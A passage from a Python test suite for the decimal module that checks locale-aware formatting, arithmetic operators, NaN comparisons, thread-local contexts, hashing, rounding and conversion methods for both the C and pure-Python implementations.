return Decimal(x).__format__(fmt, override)
else:
return Decimal(x).__format__(fmt, _localeconv=override)
# Set up some localeconv-like dictionaries
en_US = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
fr_FR = {
'decimal_point' : ',',
'grouping' : make_grouping([CHAR_MAX]),
'thousands_sep' : ''
}
ru_RU = {
'decimal_point' : ',',
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : ' '
}
crazy = {
'decimal_point' : '&',
'grouping': make_grouping([1, 4, 2, CHAR_MAX]),
'thousands_sep' : '-'
}
dotsep_wide = {
'decimal_point' : b'\xc2\xbf'.decode('utf-8'),
'grouping': make_grouping([3, 3, 0]),
'thousands_sep' : b'\xc2\xb4'.decode('utf-8')
}
self.assertEqual(get_fmt(Decimal('12.7'), en_US), '12.7')
self.assertEqual(get_fmt(Decimal('12.7'), fr_FR), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), ru_RU), '12,7')
self.assertEqual(get_fmt(Decimal('12.7'), crazy), '1-2&7')
self.assertEqual(get_fmt(123456789, en_US), '123,456,789')
self.assertEqual(get_fmt(123456789, fr_FR), '123456789')
self.assertEqual(get_fmt(123456789, ru_RU), '123 456 789')
self.assertEqual(get_fmt(1234567890123, crazy), '123456-78-9012-3')
self.assertEqual(get_fmt(123456789, en_US, '.6n'), '1.23457e+8')
self.assertEqual(get_fmt(123456789, fr_FR, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, ru_RU, '.6n'), '1,23457e+8')
self.assertEqual(get_fmt(123456789, crazy, '.6n'), '1&23457e+8')
# zero padding
self.assertEqual(get_fmt(1234, fr_FR, '03n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '04n'), '1234')
self.assertEqual(get_fmt(1234, fr_FR, '05n'), '01234')
self.assertEqual(get_fmt(1234, fr_FR, '06n'), '001234')
self.assertEqual(get_fmt(12345, en_US, '05n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '06n'), '12,345')
self.assertEqual(get_fmt(12345, en_US, '07n'), '012,345')
self.assertEqual(get_fmt(12345, en_US, '08n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '09n'), '0,012,345')
self.assertEqual(get_fmt(12345, en_US, '010n'), '00,012,345')
self.assertEqual(get_fmt(123456, crazy, '06n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '07n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '08n'), '1-2345-6')
self.assertEqual(get_fmt(123456, crazy, '09n'), '01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '010n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '011n'), '0-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '012n'), '00-01-2345-6')
self.assertEqual(get_fmt(123456, crazy, '013n'), '000-01-2345-6')
# wide char separator and decimal point
self.assertEqual(get_fmt(Decimal('-1.5'), dotsep_wide, '020n'),
'-0\u00b4000\u00b4000\u00b4000\u00b4001\u00bf5')
@run_with_locale('LC_ALL', 'ps_AF')
def test_wide_char_separator_decimal_point(self):
# locale with wide char separator and decimal point
Decimal = self.decimal.Decimal
decimal_point = locale.localeconv()['decimal_point']
thousands_sep = locale.localeconv()['thousands_sep']
if decimal_point != '\u066b':
self.skipTest('inappropriate decimal point separator '
'({!a} not {!a})'.format(decimal_point, '\u066b'))
if thousands_sep != '\u066c':
self.skipTest('inappropriate thousands separator '
'({!a} not {!a})'.format(thousands_sep, '\u066c'))
self.assertEqual(format(Decimal('100000000.123'), 'n'),
'100\u066c000\u066c000\u066b123')
def test_decimal_from_float_argument_type(self):
class A(self.decimal.Decimal):
def __init__(self, a):
self.a_type = type(a)
a = A.from_float(42.5)
self.assertEqual(self.decimal.Decimal, a.a_type)
a = A.from_float(42)
self.assertEqual(self.decimal.Decimal, a.a_type)
class CFormatTest(FormatTest):
decimal = C
class PyFormatTest(FormatTest):
decimal = P
class ArithmeticOperatorsTest(unittest.TestCase):
'''Unit tests for all arithmetic operators, binary and unary.'''
def test_addition(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1+d2, Decimal('11.1'))
self.assertEqual(d2+d1, Decimal('11.1'))
#with other type, left
c = d1 + 5
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 + d1
self.assertEqual(c, Decimal('-6.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 += d2
self.assertEqual(d1, Decimal('11.1'))
#inline with other type
d1 += 5
self.assertEqual(d1, Decimal('16.1'))
def test_subtraction(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-11.1')
d2 = Decimal('22.2')
#two Decimals
self.assertEqual(d1-d2, Decimal('-33.3'))
self.assertEqual(d2-d1, Decimal('33.3'))
#with other type, left
c = d1 - 5
self.assertEqual(c, Decimal('-16.1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 - d1
self.assertEqual(c, Decimal('16.1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 -= d2
self.assertEqual(d1, Decimal('-33.3'))
#inline with other type
d1 -= 5
self.assertEqual(d1, Decimal('-38.3'))
def test_multiplication(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('3')
#two Decimals
self.assertEqual(d1*d2, Decimal('-15'))
self.assertEqual(d2*d1, Decimal('-15'))
#with other type, left
c = d1 * 5
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 5 * d1
self.assertEqual(c, Decimal('-25'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 *= d2
self.assertEqual(d1, Decimal('-15'))
#inline with other type
d1 *= 5
self.assertEqual(d1, Decimal('-75'))
def test_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('-5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1/d2, Decimal('-2.5'))
self.assertEqual(d2/d1, Decimal('-0.4'))
#with other type, left
c = d1 / 4
self.assertEqual(c, Decimal('-1.25'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 4 / d1
self.assertEqual(c, Decimal('-0.8'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 /= d2
self.assertEqual(d1, Decimal('-2.5'))
#inline with other type
d1 /= 4
self.assertEqual(d1, Decimal('-0.625'))
def test_floor_division(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1//d2, Decimal('2'))
self.assertEqual(d2//d1, Decimal('0'))
#with other type, left
c = d1 // 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 // d1
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 //= d2
self.assertEqual(d1, Decimal('2'))
#inline with other type
d1 //= 2
self.assertEqual(d1, Decimal('1'))
def test_powering(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1**d2, Decimal('25'))
self.assertEqual(d2**d1, Decimal('32'))
#with other type, left
c = d1 ** 4
self.assertEqual(c, Decimal('625'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 ** d1
self.assertEqual(c, Decimal('16807'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 **= d2
self.assertEqual(d1, Decimal('25'))
#inline with other type
d1 **= 4
self.assertEqual(d1, Decimal('390625'))
def test_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
self.assertEqual(d1%d2, Decimal('1'))
self.assertEqual(d2%d1, Decimal('2'))
#with other type, left
c = d1 % 4
self.assertEqual(c, Decimal('1'))
self.assertEqual(type(c), type(d1))
#with other type, right
c = 7 % d1
self.assertEqual(c, Decimal('2'))
self.assertEqual(type(c), type(d1))
#inline with decimal
d1 %= d2
self.assertEqual(d1, Decimal('1'))
#inline with other type
d1 %= 4
self.assertEqual(d1, Decimal('1'))
def test_floor_div_module(self):
Decimal = self.decimal.Decimal
d1 = Decimal('5')
d2 = Decimal('2')
#two Decimals
(p, q) = divmod(d1, d2)
self.assertEqual(p, Decimal('2'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, left
(p, q) = divmod(d1, 4)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('1'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
#with other type, right
(p, q) = divmod(7, d1)
self.assertEqual(p, Decimal('1'))
self.assertEqual(q, Decimal('2'))
self.assertEqual(type(p), type(d1))
self.assertEqual(type(q), type(d1))
def test_unary_operators(self):
Decimal = self.decimal.Decimal
self.assertEqual(+Decimal(45), Decimal(+45)) # +
self.assertEqual(-Decimal(45), Decimal(-45)) # -
self.assertEqual(abs(Decimal(45)), abs(Decimal(-45))) # abs
def test_nan_comparisons(self):
# comparisons involving signaling nans signal InvalidOperation
# order comparisons (<, <=, >, >=) involving only quiet nans
# also signal InvalidOperation
# equality comparisons (==, !=) involving only quiet nans
# don't signal, but return False or True respectively.
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
n = Decimal('NaN')
s = Decimal('sNaN')
i = Decimal('Inf')
f = Decimal('2')
qnan_pairs = (n, n), (n, i), (i, n), (n, f), (f, n)
snan_pairs = (s, n), (n, s), (s, i), (i, s), (s, f), (f, s), (s, s)
order_ops = operator.lt, operator.le, operator.gt, operator.ge
equality_ops = operator.eq, operator.ne
# results when InvalidOperation is not trapped
for x, y in qnan_pairs + snan_pairs:
for op in order_ops + equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
# repeat the above, but this time trap the InvalidOperation
with localcontext() as ctx:
ctx.traps[InvalidOperation] = 1
for x, y in qnan_pairs:
for op in equality_ops:
got = op(x, y)
expected = True if op is operator.ne else False
self.assertIs(expected, got,
"expected {0!r} for "
"operator.{1}({2!r}, {3!r}); "
"got {4!r}".format(
expected, op.__name__, x, y, got))
for x, y in snan_pairs:
for op in equality_ops:
self.assertRaises(InvalidOperation, operator.eq, x, y)
self.assertRaises(InvalidOperation, operator.ne, x, y)
for x, y in qnan_pairs + snan_pairs:
for op in order_ops:
self.assertRaises(InvalidOperation, op, x, y)
def test_copy_sign(self):
Decimal = self.decimal.Decimal
d = Decimal(1).copy_sign(Decimal(-2))
self.assertEqual(Decimal(1).copy_sign(-2), d)
self.assertRaises(TypeError, Decimal(1).copy_sign, '-2')
class CArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = C
class PyArithmeticOperatorsTest(ArithmeticOperatorsTest):
decimal = P
# The following are two functions used to test threading in the next class
def thfunc1(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
cls.finish1.set()
cls.synchro.wait()
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(DivisionByZero, c2.divide, d1, 0)
cls.assertTrue(c2.flags[DivisionByZero])
with localcontext() as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertTrue(c3.flags[DivisionByZero])
cls.assertRaises(InvalidOperation, c3.compare, d1, Decimal('sNaN'))
cls.assertTrue(c3.flags[InvalidOperation])
del c3
cls.assertFalse(c2.flags[InvalidOperation])
del c2
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333333333'))
c1 = getcontext()
cls.assertTrue(c1.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(c1.flags[sig])
def thfunc2(cls):
Decimal = cls.decimal.Decimal
InvalidOperation = cls.decimal.InvalidOperation
DivisionByZero = cls.decimal.DivisionByZero
Overflow = cls.decimal.Overflow
Underflow = cls.decimal.Underflow
Inexact = cls.decimal.Inexact
getcontext = cls.decimal.getcontext
localcontext = cls.decimal.localcontext
d1 = Decimal(1)
d3 = Decimal(3)
test1 = d1/d3
thiscontext = getcontext()
thiscontext.prec = 18
test2 = d1/d3
with localcontext() as c2:
cls.assertTrue(c2.flags[Inexact])
cls.assertRaises(Overflow, c2.multiply, Decimal('1e425000000'), 999)
cls.assertTrue(c2.flags[Overflow])
with localcontext(thiscontext) as c3:
cls.assertTrue(c3.flags[Inexact])
cls.assertFalse(c3.flags[Overflow])
c3.traps[Underflow] = True
cls.assertRaises(Underflow, c3.divide, Decimal('1e-425000000'), 999)
cls.assertTrue(c3.flags[Underflow])
del c3
cls.assertFalse(c2.flags[Underflow])
cls.assertFalse(c2.traps[Underflow])
del c2
cls.synchro.set()
cls.finish2.set()
cls.assertEqual(test1, Decimal('0.333333333333333333333333'))
cls.assertEqual(test2, Decimal('0.333333333333333333'))
cls.assertFalse(thiscontext.traps[Underflow])
cls.assertTrue(thiscontext.flags[Inexact])
for sig in Overflow, Underflow, DivisionByZero, InvalidOperation:
cls.assertFalse(thiscontext.flags[sig])
class ThreadingTest(unittest.TestCase):
'''Unit tests for thread local contexts in Decimal.'''
# Take care executing this test from IDLE, there's an issue in threading
# that hangs IDLE and I couldn't find it
def test_threading(self):
DefaultContext = self.decimal.DefaultContext
if self.decimal == C and not self.decimal.HAVE_THREADS:
self.skipTest("compiled without threading")
# Test the "threading isolation" of a Context. Also test changing
# the DefaultContext, which acts as a template for the thread-local
# contexts.
save_prec = DefaultContext.prec
save_emax = DefaultContext.Emax
save_emin = DefaultContext.Emin
DefaultContext.prec = 24
DefaultContext.Emax = 425000000
DefaultContext.Emin = -425000000
self.synchro = threading.Event()
self.finish1 = threading.Event()
self.finish2 = threading.Event()
th1 = threading.Thread(target=thfunc1, args=(self,))
th2 = threading.Thread(target=thfunc2, args=(self,))
th1.start()
th2.start()
self.finish1.wait()
self.finish2.wait()
for sig in Signals[self.decimal]:
self.assertFalse(DefaultContext.flags[sig])
th1.join()
th2.join()
DefaultContext.prec = save_prec
DefaultContext.Emax = save_emax
DefaultContext.Emin = save_emin
class CThreadingTest(ThreadingTest):
decimal = C
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
#a Decimal and uncomparable
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
#the same hash that to an int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
# check that the hashes of a Decimal float match when they
# represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
Decimal = self.decimal.Decimal
# exceptional cases
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('inf'))
self.assertRaises(OverflowError,
Decimal.as_integer_ratio, Decimal('-inf'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('-nan'))
self.assertRaises(ValueError,
Decimal.as_integer_ratio, Decimal('snan123'))
for exp in range(-4, 2):
for coeff in range(1000):
for sign in '+', '-':
d = Decimal('%s%dE%d' % (sign, coeff, exp))
pq = d.as_integer_ratio()
p, q = pq
# check return type
self.assertIsInstance(pq, tuple)
self.assertIsInstance(p, int)
self.assertIsInstance(q, int)
# check normalization: q should be positive;
# p should be relatively prime to q.
self.assertGreater(q, 0)
self.assertEqual(math.gcd(p, q), 1)
# check that p/q actually gives the correct value
self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
